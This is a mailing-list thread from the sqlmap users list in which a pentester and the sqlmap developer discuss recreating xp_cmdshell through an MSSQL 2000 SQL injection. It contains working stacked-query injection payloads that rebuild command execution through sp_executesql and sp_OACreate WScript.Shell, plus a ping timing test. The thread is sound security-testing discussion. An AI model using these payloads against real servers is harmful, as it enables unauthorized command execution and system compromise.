Re: [sqlmap-users] re-create xp_cmdshell
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] re-create xp_cmdshell
|
From: Adi M. <adi...@ya...> - 2012-06-18 10:59:50
|
No problem. Thanks, that worked, executed without error, however i still can't execute code. I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';-- but nothing, no delay. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Monday, June 18, 2012 1:38 PM Subject: Re: [sqlmap-users] re-create xp_cmdshell My bad. I've thought that the problem is trivial :) This is the right way how to do it: http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you Kind regards, Miroslav Stampar On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote: Hi Adi. > > >This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign. > > >So, if you have a SELECT SQLi case like: >SELECT * FROM users WHERE id=$_GET['id'] > > >you would need to inject into it something like: >http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. > > >As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject: >http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a.... > >Kind regards, >Miroslav Stampar > > >On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > > >> >>Hello, >> >> >>I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell and i get this: >> >> >>'CREATE PROCEDURE' must be the first statement in a query batch. >> >> >> >>Anybody has any idea about this behavious and if it can be done something about this? >> >> >>Thanks >> >> >>------------------------------------------------------------------------------ >>Live Security Virtual Conference >>Exclusive live event will cover all the ways today's security and >>threat landscape has changed and how IT managers can respond. Discussions >>will include endpoint security, mobile security and the latest in malware >>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>_______________________________________________ >>sqlmap-users mailing list >>sql...@li... >>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
